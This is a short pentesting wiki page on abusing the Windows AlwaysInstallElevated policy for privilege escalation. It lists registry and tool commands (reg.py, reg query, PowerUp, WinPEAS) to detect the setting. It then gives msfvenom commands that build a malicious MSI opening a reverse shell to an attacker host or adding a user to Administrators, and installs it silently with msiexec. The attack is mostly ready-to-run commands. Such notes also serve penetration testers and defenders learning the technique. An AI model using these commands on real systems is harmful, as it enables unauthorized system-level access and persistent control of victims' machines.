AlwaysInstallElevated
MITRE ATT&CK™ System Binary Proxy Execution: Msiexec - Technique T1218.007
Theory
The AlwaysInstallElevated policy feature offers ALL users on a Windows operating systems the ability to install an MSI package file with elevated (system) privileges.
Practice
If it is enabled, it will create the value AlwaysIntstallElevated and set it to 0x1 (enabled) on the following two registry keys. Impacket's reg.py (Python) script can be used to query registry remotely from a UNIX-like machine.
reg.py domain.local/username:password123@<TARGET_IP> query -keyName "HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer" -v AlwaysInstallElevated
reg.py domain.local/username:password123@<TARGET_IP> query -keyName "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" -v AlwaysInstallElevatedManual verification of the activation of this parameter is very simple and can be done with two commands. If it is enabled, it will create the value AlwaysIntstallElevated and set it to 0x1 (enabled) on the following two registry keys.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedAlternatively, using PowerUp from Powersploit we can enumerate the AlwaysInstallElevated policy.
. .\PowerUp.ps1
Invoke-AllChecksAlternatively, using the systeminfo module of WinPeas
winPEASx64.exe systeminfoWe just have to generate a malicious MSI file and install it with msiexec.exe
Generate a malicious MSI
# Reverse Shell
v4resk㉿kali$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<ATTACKING_PORT> -f msi > package.msi
# Add user to Administrators
v4resk㉿kali$ msfvenom -p windows/exec CMD='net localgroup administrators <YOUR_USER> /add' -f msi > package.msiThen, after downloading it to the target, install the MSI file using msiexec
msiexec.exe /quiet /qn /i package.msiResources
Last updated
Was this helpful?